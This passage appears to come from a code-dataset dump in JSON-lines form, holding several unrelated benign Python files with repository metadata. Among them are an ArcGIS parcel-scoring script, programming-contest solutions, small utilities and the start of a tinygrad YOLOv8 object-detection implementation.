\r\n # Add a new field for the categorization score\r\n arcpy.AddField_management(parcels, 'pri_scr', 'DOUBLE')\r\n \r\n # Calculate normalized weights\r\n total_weight = np.sum(field_weight)\r\n \r\n namelist = list()\r\n soillist = list()\r\n \r\n # Calculate the normalized weight for all criteria\r\n for k in range(len(fieldnames)):\r\n if field_weight[k] == 0:\r\n pass\r\n else:\r\n # # Add a weight field and normalize by total weight\r\n # wtfld = str(fieldnames[k]) + '_wt'\r\n # # soillist.append(soilind[k])\r\n # namelist.append(wtfld)\r\n # expr_type = \"PYTHON\"\r\n # expr = str(field_weight[k]) + '*(1.0/' + str(total_weight) + ')'\r\n # arcpy.AddField_management(parcels, wtfld, 'DOUBLE')\r\n # arcpy.CalculateField_management(parcels, wtfld, expr, expr_type)\r\n # Add a weight field\r\n wtfld = str(fieldnames[k]) + '_wt'\r\n # soillist.append(soilind[k])\r\n namelist.append(wtfld)\r\n expr_type = \"PYTHON\"\r\n expr = str(field_weight[k])\r\n arcpy.AddField_management(parcels, wtfld, 'DOUBLE')\r\n arcpy.CalculateField_management(parcels, wtfld, expr, expr_type)\r\n \r\n arcpy.AddMessage(str(namelist))\r\n arcpy.AddMessage(str(soillist))\r\n \r\n # add prioritization field\r\n expr_pri = ''\r\n expr_soil = 'max(['\r\n for k in range(len(namelist)):\r\n if soilind[k]:\r\n # If a soil field, add to the list of soil fields.\r\n expr_soil = expr_soil + '!' + scrnames[k] + '!*!' + namelist[k] + '!, '\r\n else:\r\n # If not, add to the calculation.\r\n expr_pri = expr_pri + ' + ' + '!' + scrnames[k] + '!*!' + namelist[k] + '!'\r\n \r\n # Done with list: Take max of soil fields.\r\n \r\n expr_soil = expr_soil[:-2] # Strip last comma and space\r\n expr_soil = expr_soil + '])'# Conclude the \"Max\"\r\n if sum(soilind) == 0: \r\n # If all soils weighted 0, don't add them to score.\r\n expr_pri = expr_pri[3:] # Strip ' + ' from front of expr_pri.\r\n else:\r\n expr_pri = expr_pri[3:] # Strip ' + ' from front of expr_pri.\r\n expr_pri = expr_pri + ' + ' + expr_soil\r\n\r\n arcpy.AddMessage(expr_pri)\r\n arcpy.CalculateField_management(parcels, 'pri_scr', expr_pri, expr_type)\r\n \r\n # remove unneeded fields\r\n for k in range(len(namelist)):\r\n arcpy.DeleteField_management(parcels, namelist[k])\r\n \r\n return()\r\n \r\ndef categorizebmp(parcellyr, table):\r\n # Function to convert original values of criteria in parcel database to \r\n # score-relevant values based on user-defined table\r\n \r\n numcats = arcpy.GetCount_management(table)\r\n numcats = int(numcats[0])\r\n \r\n cols = [[r[0] for r in arcpy.da.SearchCursor(table, field.name)] for field in arcpy.ListFields(table)]\r\n# inds = cols[0]\r\n# criteria = cols[1]\r\n field_name = cols[2]\r\n field_weight = cols[3]\r\n num_groups = cols[4]\r\n cat_type = cols[5]\r\n threshs = np.concatenate([np.array(i) for i in cols[6:15]])\r\n threshs = np.reshape(threshs, (numcats, 9), order = 'F') # use rows-first indexing (Fortran-like)\r\n \r\n weights = np.concatenate([np.array(i) for i in cols[15:]])\r\n weights = np.reshape(weights, (numcats, 9), order = 'F') # Fortran-like indexing\r\n \r\n # Ensure soils correctly accounted for\r\n scrnames = list()\r\n numsoils = np.zeros(numcats, dtype = bool)\r\n deleteinds = list()\r\n for k in range(numcats):\r\n weight = field_weight[k] \r\n if weight == 0:\r\n deleteinds.append(k)\r\n else: # Calculate categories for that field\r\n fieldname = str(field_name[k])\r\n if fieldname.startswith('hsg'): numsoils[k] = True\r\n arcpy.AddMessage(fieldname + ' ' + str(numsoils[k]))\r\n cattype = str(cat_type[k])\r\n ngroups = num_groups[k]\r\n threshs_crit = threshs[k,0:ngroups]\r\n weights_crit = weights[k,0:ngroups]\r\n scrname = calc_catscr(parcellyr, fieldname, cattype, threshs_crit, weights_crit)\r\n scrnames.append(scrname)\r\n \r\n numsoils = np.delete(numsoils, deleteinds)\r\n \r\n # scrnames = np.asarray(scrnames) # Convert to a numpy array for easier handling.\r\n # soilscores = np.multiply(scrnames, numsoils) # Multiply by array with 1 at soil scores to convert others to 0\r\n # maxind = np.max(soilscores) # Get index where highest absolute value score is located\r\n # arcpy.AddMessage(str(soilscores))\r\n # arcpy.AddMessage(str(maxind))\r\n # numsoils = numsoils - maxind # Convert the array indexing soil scores to indexing soil scores we do not want to keep\r\n # keepinds = numsoils == False # Invert that array so that it indexes all the scores (not just soil scores) we DO want to keep\r\n # scrnames = np.multiply(scrnames, keepinds) # Multiply previous array element-wise by previous so that only one soil score remains alongside other scores\r\n \r\n # # Convert back to a list.\r\n # scrnames = scrnames.tolist()\r\n \r\n prioritize_parcels(parcellyr, field_name, scrnames, field_weight, numsoils) # Adds prioritization score to each parcel\r\n \r\n return()\r\n \r\ndef importallsheets(in_excel, out_gdb):\r\n # Function taken from ESRI documentation http://pro.arcgis.com/en/pro-app/tool-reference/conversion/excel-to-table.htm\r\n workbook = xlrd.open_workbook(in_excel)\r\n sheets = [sheet.name for sheet in workbook.sheets()]\r\n\r\n print('{} sheets found: {}'.format(len(sheets), ','.join(sheets)))\r\n for sheet in sheets:\r\n # The out_table is based on the input excel file name\r\n # a underscore (_) separator followed by the sheet name\r\n out_table = os.path.join(\r\n out_gdb,\r\n arcpy.ValidateTableName(\r\n \"{0}_{1}\".format(os.path.basename(in_excel), sheet),\r\n out_gdb))\r\n\r\n print('Converting {} to {}'.format(sheet, out_table))\r\n\r\n # Perform the conversion\r\n arcpy.ExcelToTable_conversion(in_excel, out_table, sheet)\r\n return()\r\n \r\n \r\n'''\r\n\r\nBegin the Calculations\r\n\r\n'''\r\n# 0. Convert excel table to esri table\r\nentrytable = AutoName('entryform')\r\nresult = arcpy.ExcelToTable_conversion(table, entrytable, \"Data_Entry\")\r\nentrytable = result.getOutput(0)\r\n\r\n\r\n# 1. Select records from only desired muni\r\n# Get town names from \"townpolys\" feature class\r\ntownnames = unique_values(parcels, 'muni')\r\ntownnames = [x.title() for x in townnames]\r\ntownnames_caps = [x.upper() for x in townnames]\r\n\r\nmuniparcelnames = list()\r\nfor k in range(len(townnames_caps)):\r\n muni = townnames[k]\r\n muniname = AutoName('parcels' + muni)\r\n arcpy.Select_analysis(parcels, muniname, \"muni = '\" + muni + \"'\")\r\n arcpy.AddMessage(\"Working with \" + muni + \" parcels\")\r\n\r\n # 2. Calculate scores for each criterion by threshold\r\n outname = AutoName('bmpcats_' + muniname)\r\n categorizebmp(muniname, entrytable) #outname\r\n arcpy.AddMessage(\"Categorized \" + muni + \" bmp criteria\")\r\n\r\n # 3. Calculate percentiles, sort, and export to table\r\n parceltable = arcpy.da.TableToNumPyArray(muniname, '*', null_value = 0)\r\n\r\n nparcels = len(parceltable['pri_scr'])\r\n pripct = list()\r\n for j in range(nparcels):\r\n pripct.append(1.0 - (np.sum(parceltable['pri_scr'] > parceltable['pri_scr'][j])/float(nparcels)))\r\n \r\n new_table = rec_append_fields(parceltable, 'pri_pct', data = pripct, dtypes = ' 1) and changed:\n a = lst[-1]\n b = lst[-2]\n changed = False\n for comb in combinations:\n if comb[0] == a:\n if comb[1] == b:\n lst.pop()\n lst.pop()\n lst.append(comb[2])\n changed = True\n break;\n if comb[0] == b:\n if comb[1] == a:\n lst.pop()\n lst.pop()\n lst.append(comb[2])\n changed = True\n break\n \n return lst\n \ndef check(oppos, lst):\n for items in oppos:\n if (items[0] in lst) and (items[1] in lst):\n return []\n return lst\n \n\ndef solve(data):\n result = []\n for i in data[2]:\n result.append(i)\n result = combine(data[0], result)\n result = check(data[1], result)\n return \"[\" + \", \".join([\"%c\" % i for i in result]) + \"]\"\n \n######################## Template ########################\n\ndef problem(fin):\n items = fin.readline().strip('\\n').split(' ')\n items.reverse()\n comb = []\n for i in xrange(int(items.pop())):\n comb.append(items.pop())\n oppos = []\n for i in xrange(int(items.pop())):\n oppos.append(items.pop())\n i = items.pop()\n lst = items.pop()\n return (comb, oppos, lst)\n \nif __name__ == '__main__':\n from sys import argv\n \n fin = open(argv[1])\n fout = open(argv[1].replace(\"in\", \"out\"), \"w\")\n \n numLines = int(fin.readline())\n problem_list = [problem(fin) for i in range(numLines)]\n \n solution_list = map(solve, problem_list)\n\n for i, s in enumerate(solution_list):\n fout.write(\"Case #%s: %s\\n\" % (i + 1, s))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/669.py","file_name":"669.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23425834371","text":"#!/usr/bin/env python\r\n\r\nfrom __future__ import print_function\r\n\r\nimport sys\r\nfrom collections import defaultdict\r\n\r\n\r\ndef main(*args):\r\n if(len(args) < 2):\r\n print(\"Usage: %s \" % args[0])\r\n\r\n filename = args[1]\r\n input_file = open(filename, \"rb\")\r\n output_file = open(filename+\".out\", \"wb\")\r\n\r\n try:\r\n in_str = input_file.readline().strip()\r\n except:\r\n print(\"Premature end of input\")\r\n\r\n T = int(in_str)\r\n for k in range(T):\r\n input_strs = input_file.readline().split()\r\n C = float(input_strs[0])\r\n F = float(input_strs[1])\r\n X = float(input_strs[2])\r\n\r\n time_taken = 0.0\r\n cookie_rate = 2.0\r\n while(True):\r\n if(X/cookie_rate < (C/cookie_rate + X/(F+cookie_rate)) ):\r\n time_taken += X / cookie_rate\r\n # print('Time taken:', time_taken)\r\n # print('cookie_rate:', cookie_rate)\r\n break\r\n else:\r\n time_taken += C / cookie_rate\r\n cookie_rate += F\r\n # print('Time taken:', time_taken)\r\n # print('cookie_rate:', cookie_rate)\r\n\r\n print(\"Case #%d: %0.7f\" % (k+1, time_taken), file=output_file)\r\n \r\n input_file.close()\r\n output_file.close()\r\n\r\n\r\nif(__name__ == \"__main__\"):\r\n sys.exit(main(*sys.argv))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2754.py","file_name":"2754.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8981510715","text":"import speech_recognition as sr\n\n# recognize speech using Google Speech Recognition\ndef get_recognize_google():\n try:\n r = sr.Recognizer()\n with sr.Microphone() as source:\n audio = r.listen(source)\n return r.recognize_google(audio)\n except sr.UnknownValueError:\n return \"No puedo entender el audio\"\n except sr.RequestError as e:\n return \"No se pudieron solicitar resultados del servicio de reconocimiento de voz de Google\" \n\n","repo_name":"konkut/Chatbot","sub_path":"speech__recognition.py","file_name":"speech__recognition.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565738434","text":"\nfrom typing import List\nclass Solution:\n \n \n def findNumbers(self, nums: List[int]) -> int:\n \n # convert all number to string, store in list\n strnum_list = list( map( str, nums) )\n \n # a functor to judge if a string is with even number digits\n func_even_digits = lambda x: (len(x)%2==0)\n \n # use functor to select those strings with even number digits\n list_even_num_of_digits = list( filter( func_even_digits, strnum_list) )\n \n # total count of even digits number\n return len( list_even_num_of_digits )\n \n\n\n\n# n : the number of elements in input list\n\n## Time Complexity: O(n)\n#\n# The overhead in time is the hidden iteraion of O( n ) in map... and list constructor.\n\n## Space Complexity: O(n)\n#\n# The overhead in space is to maintain a string list of order O( n )\n\n\n\ndef test_bench():\n\n test_data = [12,345,2,6,7896]\n\n \n\n print( Solution().findNumbers(test_data) )\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1295_Find Numbers with Even Number of Digits/find_number_with_even_number_of_digits.py","file_name":"find_number_with_even_number_of_digits.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"11600516299","text":"from sys import argv,stdout\nfrom time import sleep\n\ninfile = open(argv[1])\noutfile = stdout.buffer\n\ndef readfile():\n global last_time\n for line in infile:\n sline = line.strip()\n current_time = float(sline.split(\" \")[0])\n sleep(current_time-last_time)\n message = bytes.fromhex(sline.split(\" \")[1])\n outfile.write(message)\n outfile.flush()\n last_time = current_time\n\nwhile True:\n last_time = 0\n readfile()\n infile.seek(0)\n\n \n","repo_name":"Haschtl/RTOC-Plugins","sub_path":"HoldPeak VC820/holdPeak_VC820/vc820py/replay_rawtime.py","file_name":"replay_rawtime.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72267443715","text":"# by hege\r\n\r\nimport os\r\nimport sys\r\nimport zipfile\r\n\r\n# package\r\nimport ctypes\r\nimport logging\r\nimport sqlite3\r\n\r\n# lib path\r\nlib_path = os.path.dirname(os.__file__)\r\n\r\n# create small zipfile with just a few libraries\r\ndef make_smallzip():\r\n\tzip_path = \"libsmall.zip\"\r\n\tzip_path = os.path.abspath(os.path.join(os.path.dirname(__file__),zip_path))\r\n\tif os.path.exists(zip_path):\r\n\t\tos.unlink(zip_path)\r\n\tzip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED)\r\n\tzip_obj.writepy(os.path.dirname(ctypes.__file__))\r\n\tzip_obj.writepy(os.path.dirname(logging.__file__))\r\n\tzip_obj.writepy(os.path.dirname(sqlite3.__file__))\r\n\tzip_obj.close()\r\n\r\n# create medium zipfile with everything in top-level stdlib\r\ndef make_mediumzip():\r\n\tzip_path = \"libmedium.zip\"\r\n\tif os.path.exists(zip_path):\r\n\t\tos.unlink(zip_path)\r\n\tzip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED)\r\n\tzip_obj.writepy(lib_path)\r\n\tzip_obj.close()\r\n\r\n# create large zipfile with everything we can find\r\ndef make_bigzip():\r\n\tzip_path = \"libbig.zip\"\r\n\tif os.path.exists(zip_path):\r\n\t\tos.unlink(zip_path)\r\n\t#zip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED,optimize=-1)\r\n\tzip_obj = zipfile.PyZipFile(zip_path,\"w\",compression=zipfile.ZIP_DEFLATED)\r\n\tzip_obj.writepy(lib_path)\r\n\tfor (root,dirs,files) in os.walk(lib_path):\r\n\t\tif os.path.basename(root) in (\"idlelib\",\"test\",\"tkinter\",\"turtledemo\",):\r\n\t\t\tdel dirs[:]\r\n\t\t\tcontinue\r\n\t\tif \"__init__.py\" in files:\r\n\t\t\tdel dirs[:]\r\n\t\t\ttry:\r\n\t\t\t\t#print(root)\r\n\t\t\t\tzip_obj.writepy(root)\r\n\t\t\texcept (EnvironmentError,SyntaxError,):\r\n\t\t\t\tpass\r\n\tzip_obj.close()\r\n\r\nif __name__ == \"__main__\":\r\n\tmake_smallzip()\r\n\tmake_mediumzip()\r\n\tmake_bigzip()","repo_name":"hefen1/kalpa","sub_path":"tools/scripts/make_python_ziplib.py","file_name":"make_python_ziplib.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3688825558","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nimport sys\nargs = [eval(x) for x in sys.argv[1:]]\nsuma, godini, god_procent= args[:3]\n#godini2, god_procent2 = args[3:] and args[3:5] or (0,0)\n\ndef calc( suma, godini, god_procent, G2M =12):\n#http://krediten-kalkulator.bghot.com/\n meseci = godini*G2M\n mes_lihva = god_procent /100.0/G2M\n x= (1 + mes_lihva) ** meseci\n mes_suma = (suma * x * mes_lihva)/(x-1)\n vse_suma = mes_suma * meseci\n return mes_suma, vse_suma\n\nif god_procent<0:\n merka,G2M,god_procent = 'den',365,-god_procent\nelse:\n merka,G2M,god_procent = 'mesec',12,god_procent\nmes_suma, vse_suma = calc( suma, godini, god_procent, G2M)\nprint( #int(mes_suma), '/'+merka,\n int(vse_suma/godini/12), '/m',\n '==', int(vse_suma), int(vse_suma*100/suma),'%', )\n\n# vim:ts=4:sw=4:expandtab\n","repo_name":"svilendobrev/svd_bin","sub_path":"misc/lih.py","file_name":"lih.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"sr","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"38064908457","text":"import sys\ninput = sys.stdin.readline\n\n\ndef main():\n\n def find(x):\n if x == p[x]:\n return x\n p[x] = find(p[x])\n return p[x]\n\n def union(x, y):\n x = find(x)\n y = find(y)\n if x < y:\n p[y] = x\n else:\n p[x] = y\n\n n = int(input())\n p = [i for i in range(n)]\n m = int(input())\n for i in range(n):\n tmp = list(map(int, input().split()))\n for j in range(n):\n if i != j and tmp[j] == 1:\n union(i, j)\n\n ans = set()\n for n in map(lambda x: int(x)-1, input().split()):\n ans.add(find(n))\n if len(ans) > 1:\n print(\"NO\")\n exit()\n print(\"YES\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj1976.py","file_name":"bj1976.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24818102931","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(8, 8), dpi=80) # initializing a fig with 8x8 inches\n\n# initial some (x,y) data points in numpy array\nx = np.linspace(0.,40.,1000)\ny1 = np.sin(x)*np.exp(-x*0.10)\ny2 = np.cos(x)*np.exp(-x*0.15)\ny3 = np.sin(x*2.0)*np.sin(x*0.2)*np.random.rand(x.size)\n\nplt.subplot(2, 1, 1) # initial a subplot, from grid of 1x2\nplt.plot(x, y1, color = 'blue', linewidth = 2, linestyle = '-')\nplt.plot(x, y2, color = 'red', linewidth = 2, linestyle = '--')\nplt.ylim(-1.,+1.)\n\nplt.subplot(2, 1, 2) # initial another subplot\nplt.plot(x, y3, color = 'green', linewidth = 1)\n\nplt.show()","repo_name":"yipeichan/Numerical_Ananlysis_and_Programming","sub_path":"l8-example-02.py","file_name":"l8-example-02.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21771290692","text":"from tinygrad.nn import Conv2d, BatchNorm2d\nfrom tinygrad.tensor import Tensor\nimport numpy as np\nfrom itertools import chain\nfrom pathlib import Path\nimport cv2\nfrom collections import defaultdict\nimport time, sys\nfrom tinygrad.helpers import fetch\nfrom tinygrad.nn.state import safe_load, load_state_dict\n\n#Model architecture from https://github.com/ultralytics/ultralytics/issues/189\n#The upsampling class has been taken from this pull request https://github.com/tinygrad/tinygrad/pull/784 by dc-dc-dc. Now 2(?) models use upsampling. (retinet and this)\n\n#Pre processing image functions.\ndef compute_transform(image, new_shape=(640, 640), auto=False, scaleFill=False, scaleup=True, stride=32):\n shape = image.shape[:2] # current shape [height, width]\n new_shape = (new_shape, new_shape) if isinstance(new_shape, int) else new_shape\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n r = min(r, 1.0) if not scaleup else r\n new_unpad = (int(round(shape[1] * r)), int(round(shape[0] * r)))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]\n dw, dh = (np.mod(dw, stride), np.mod(dh, stride)) if auto else (0.0, 0.0)\n new_unpad = (new_shape[1], new_shape[0]) if scaleFill else new_unpad\n dw /= 2\n dh /= 2\n image = cv2.resize(image, new_unpad, interpolation=cv2.INTER_LINEAR) if shape[::-1] != new_unpad else image\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n image = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=(114, 114, 114))\n return image\n\ndef preprocess(im, imgsz=640, model_stride=32, model_pt=True):\n same_shapes = all(x.shape == im[0].shape for x in im)\n auto = same_shapes and model_pt\n im = Tensor([compute_transform(x, new_shape=imgsz, auto=auto, stride=model_stride) for x in im])\n im = Tensor.stack(im) if im.shape[0] > 1 else im\n im = im[..., ::-1].permute(0, 3, 1, 2) # BGR to RGB, BHWC to BCHW, (n, 3, h, w)\n im /= 255 # 0 - 255 to 0.0 - 1.0\n return im\n\n# Post Processing functions\ndef box_area(box):\n return (box[:, 2] - box[:, 0]) * (box[:, 3] - box[:, 1])\n\ndef box_iou(box1, box2):\n lt = np.maximum(box1[:, None, :2], box2[:, :2])\n rb = np.minimum(box1[:, None, 2:], box2[:, 2:])\n wh = np.clip(rb - lt, 0, None)\n inter = wh[:, :, 0] * wh[:, :, 1]\n area1 = box_area(box1)[:, None]\n area2 = box_area(box2)[None, :]\n iou = inter / (area1 + area2 - inter)\n return iou\n\ndef compute_nms(boxes, scores, iou_threshold):\n order, keep = scores.argsort()[::-1], []\n while order.size > 0:\n i = order[0]\n keep.append(i)\n if order.size == 1:\n break\n iou = box_iou(boxes[i][None, :], boxes[order[1:]])\n inds = np.where(iou.squeeze() <= iou_threshold)[0]\n order = order[inds + 1]\n return np.array(keep)\n\ndef non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, agnostic=False, max_det=300, nc=0, max_wh=7680):\n prediction = prediction[0] if isinstance(prediction, (list, tuple)) else prediction\n bs, nc = prediction.shape[0], nc or (prediction.shape[1] - 4)\n xc = np.amax(prediction[:, 4:4 + nc], axis=1) > conf_thres\n nm = prediction.shape[1] - nc - 4\n output = [np.zeros((0, 6 + nm))] * bs\n\n for xi, x in enumerate(prediction):\n x = x.swapaxes(0, -1)[xc[xi]]\n if not x.shape[0]: continue\n box, cls, mask = np.split(x, [4, 4 + nc], axis=1)\n conf, j = np.max(cls, axis=1, keepdims=True), np.argmax(cls, axis=1, keepdims=True)\n x = np.concatenate((xywh2xyxy(box), conf, j.astype(np.float32), mask), axis=1)\n x = x[conf.ravel() > conf_thres]\n if not x.shape[0]: continue\n x = x[np.argsort(-x[:, 4])]\n c = x[:, 5:6] * (0 if agnostic else max_wh)\n boxes, scores = x[:, :4] + c, x[:, 4]\n i = compute_nms(boxes, scores, iou_thres)[:max_det]\n output[xi] = x[i]\n return output\n\ndef postprocess(preds, img, orig_imgs):\n print('copying to CPU now for post processing')\n #if you are on CPU, this causes an overflow runtime error. doesn't \"seem\" to make any difference in the predictions though.\n # TODO: make non_max_suppression in tinygrad - to make this faster\n preds = preds.numpy() if isinstance(preds, Tensor) else preds\n preds = non_max_suppression(prediction=preds, conf_thres=0.25, iou_thres=0.7, agnostic=False, max_det=300)\n all_preds = []\n for i, pred in enumerate(preds):\n orig_img = orig_imgs[i] if isinstance(orig_imgs, list) else orig_imgs\n if not isinstance(orig_imgs, Tensor):\n pred[:, :4] = scale_boxes(img.shape[2:], pred[:, :4], orig_img.shape)\n all_preds.append(pred)\n return all_preds\n\ndef draw_bounding_boxes_and_save(orig_img_paths, output_img_paths, all_predictions, class_labels, iou_threshold=0.5):\n color_dict = {label: tuple((((i+1) * 50) % 256, ((i+1) * 100) % 256, ((i+1) * 150) % 256)) for i, label in enumerate(class_labels)}\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n def is_bright_color(color):\n r, g, b = color\n brightness = (r * 299 + g * 587 + b * 114) / 1000\n return brightness > 127\n\n for img_idx, (orig_img_path, output_img_path, predictions) in enumerate(zip(orig_img_paths, output_img_paths, all_predictions)):\n predictions = np.array(predictions)\n orig_img = cv2.imread(orig_img_path) if not isinstance(orig_img_path, np.ndarray) else cv2.imdecode(orig_img_path, 1)\n height, width, _ = orig_img.shape\n box_thickness = int((height + width) / 400)\n font_scale = (height + width) / 2500\n\n grouped_preds = defaultdict(list)\n object_count = defaultdict(int)\n\n for pred_np in predictions:\n grouped_preds[int(pred_np[-1])].append(pred_np)\n\n def draw_box_and_label(pred, color):\n x1, y1, x2, y2, conf, _ = pred\n x1, y1, x2, y2 = map(int, (x1, y1, x2, y2))\n cv2.rectangle(orig_img, (x1, y1), (x2, y2), color, box_thickness)\n label = f\"{class_labels[class_id]} {conf:.2f}\"\n text_size, _ = cv2.getTextSize(label, font, font_scale, 1)\n label_y, bg_y = (y1 - 4, y1 - text_size[1] - 4) if y1 - text_size[1] - 4 > 0 else (y1 + text_size[1], y1)\n cv2.rectangle(orig_img, (x1, bg_y), (x1 + text_size[0], bg_y + text_size[1]), color, -1)\n font_color = (0, 0, 0) if is_bright_color(color) else (255, 255, 255)\n cv2.putText(orig_img, label, (x1, label_y), font, font_scale, font_color, 1, cv2.LINE_AA)\n\n for class_id, pred_list in grouped_preds.items():\n pred_list = np.array(pred_list)\n while len(pred_list) > 0:\n max_conf_idx = np.argmax(pred_list[:, 4])\n max_conf_pred = pred_list[max_conf_idx]\n pred_list = np.delete(pred_list, max_conf_idx, axis=0)\n color = color_dict[class_labels[class_id]]\n draw_box_and_label(max_conf_pred, color)\n object_count[class_labels[class_id]] += 1\n iou_scores = box_iou(np.array([max_conf_pred[:4]]), pred_list[:, :4])\n low_iou_indices = np.where(iou_scores[0] < iou_threshold)[0]\n pred_list = pred_list[low_iou_indices]\n for low_conf_pred in pred_list:\n draw_box_and_label(low_conf_pred, color)\n\n print(f\"Image {img_idx + 1}:\")\n print(\"Objects detected:\")\n for obj, count in object_count.items():\n print(f\"- {obj}: {count}\")\n\n cv2.imwrite(output_img_path, orig_img)\n print(f'saved detections at {output_img_path}')\n\n# utility functions for forward pass.\ndef dist2bbox(distance, anchor_points, xywh=True, dim=-1):\n lt, rb = distance.chunk(2, dim)\n x1y1 = anchor_points - lt\n x2y2 = anchor_points + rb\n if xywh:\n c_xy = (x1y1 + x2y2) / 2\n wh = x2y2 - x1y1\n return c_xy.cat(wh, dim=1)\n return x1y1.cat(x2y2, dim=1)\n\ndef make_anchors(feats, strides, grid_cell_offset=0.5):\n anchor_points, stride_tensor = [], []\n assert feats is not None\n for i, stride in enumerate(strides):\n _, _, h, w = feats[i].shape\n sx = Tensor.arange(w) + grid_cell_offset\n sy = Tensor.arange(h) + grid_cell_offset\n\n # this is np.meshgrid but in tinygrad\n sx = sx.reshape(1, -1).repeat([h, 1]).reshape(-1)\n sy = sy.reshape(-1, 1).repeat([1, w]).reshape(-1)\n\n anchor_points.append(Tensor.stack((sx, sy), -1).reshape(-1, 2))\n stride_tensor.append(Tensor.full((h * w), stride))\n anchor_points = anchor_points[0].cat(anchor_points[1], anchor_points[2])\n stride_tensor = stride_tensor[0].cat(stride_tensor[1], stride_tensor[2]).unsqueeze(1)\n return anchor_points, stride_tensor\n\n# this function is from the original implementation\ndef autopad(k, p=None, d=1): # kernel, padding, dilation\n if d > 1:\n k = d * (k - 1) + 1 if isinstance(k, int) else [d * (x - 1) + 1 for x in k] # actual kernel-size\n if p is None:\n p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad\n return p\n\ndef clip_boxes(boxes, shape):\n boxes[..., [0, 2]] = np.clip(boxes[..., [0, 2]], 0, shape[1]) # x1, x2\n boxes[..., [1, 3]] = np.clip(boxes[..., [1, 3]], 0, shape[0]) # y1, y2\n return boxes\n\ndef scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None):\n gain = ratio_pad if ratio_pad else min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1])\n pad = ((img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2)\n boxes_np = boxes.numpy() if isinstance(boxes, Tensor) else boxes\n boxes_np[..., [0, 2]] -= pad[0]\n boxes_np[..., [1, 3]] -= pad[1]\n boxes_np[..., :4] /= gain\n boxes_np = clip_boxes(boxes_np, img0_shape)\n return boxes_np\n\ndef xywh2xyxy(x):\n xy = x[..., :2] # center x, y\n wh = x[..., 2:4] # width, height\n xy1 = xy - wh / 2 # top left x, y\n xy2 = xy + wh / 2 # bottom right x, y\n result = np.concatenate((xy1, xy2), axis=-1)\n return Tensor(result) if isinstance(x, Tensor) else result\n\ndef get_variant_multiples(variant):\n return {'n':(0.33, 0.25, 2.0), 's':(0.33, 0.50, 2.0), 'm':(0.67, 0.75, 1.5), 'l':(1.0, 1.0, 1.0), 'x':(1, 1.25, 1.0) }.get(variant, None)\n\ndef label_predictions(all_predictions):\n class_index_count = defaultdict(int)\n for predictions in all_predictions:\n predictions = np.array(predictions)\n for pred_np in predictions:\n class_id = int(pred_np[-1])\n class_index_count[class_id] += 1\n\n return dict(class_index_count)\n\n#this is taken from https://github.com/tinygrad/tinygrad/pull/784/files by dc-dc-dc (Now 2 models use upsampling)\nclass Upsample:\n def __init__(self, scale_factor:int, mode: str = \"nearest\") -> None:\n assert mode == \"nearest\" # only mode supported for now\n self.mode = mode\n self.scale_factor = scale_factor\n\n def __call__(self, x: Tensor) -> Tensor:\n assert len(x.shape) > 2 and len(x.shape) <= 5\n (b, c), _lens = x.shape[:2], len(x.shape[2:])\n tmp = x.reshape([b, c, -1] + [1] * _lens) * Tensor.ones(*[1, 1, 1] + [self.scale_factor] * _lens)\n return tmp.reshape(list(x.shape) + [self.scale_factor] * _lens).permute([0, 1] + list(chain.from_iterable([[y+2, y+2+_lens] for y in range(_lens)]))).reshape([b, c] + [x * self.scale_factor for x in x.shape[2:]])\n\nclass Conv_Block:\n def __init__(self, c1, c2, kernel_size=1, stride=1, groups=1, dilation=1, padding=None):\n self.conv = Conv2d(c1,c2, kernel_size, stride, padding=autopad(kernel_size, padding, dilation), bias=False, groups=groups, dilation=dilation)\n self.bn = BatchNorm2d(c2, eps=0.001)\n\n def __call__(self, x):\n return self.bn(self.conv(x)).silu()\n\nclass Bottleneck:\n def __init__(self, c1, c2 , shortcut: bool, g=1, kernels: list = (3,3), channel_factor=0.5):\n c_ = int(c2 * channel_factor)\n 